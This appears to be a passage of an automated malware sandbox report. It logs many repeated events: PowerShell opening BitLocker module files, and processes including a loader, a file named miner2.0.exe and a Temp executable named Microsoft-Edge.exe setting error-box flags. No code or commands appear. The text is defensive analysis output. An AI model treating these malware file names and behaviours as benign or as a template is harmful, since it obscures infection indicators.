Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
